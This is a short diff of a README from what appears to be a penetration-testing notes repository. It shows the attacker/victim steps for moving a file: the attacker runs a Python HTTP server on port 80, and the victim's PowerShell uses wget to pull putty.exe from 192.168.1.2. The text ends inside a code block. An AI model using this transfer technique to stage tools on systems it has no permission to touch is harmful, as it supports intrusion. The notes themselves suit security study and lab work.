MSaroeval/myfiles/README.md

 Wget
 ----
-Attacker Machine: Run the SimpleHTTP Server on port 80 on the attacker machine to send the file from that directory.
+Attacker:
 ```
 python -m SimpleHTTPServer 80
 ```
-Victim Machine: Open Powershell on the windows machine and run the following command.
+Victim: Open Powershell on the windows machine and run the following command.
 Mention the path to download the file from and then give the output path to save the file putty.exe.
 ```
 powershell
 wget http://192.168.1.2/putty.exe -OutFile putty.exe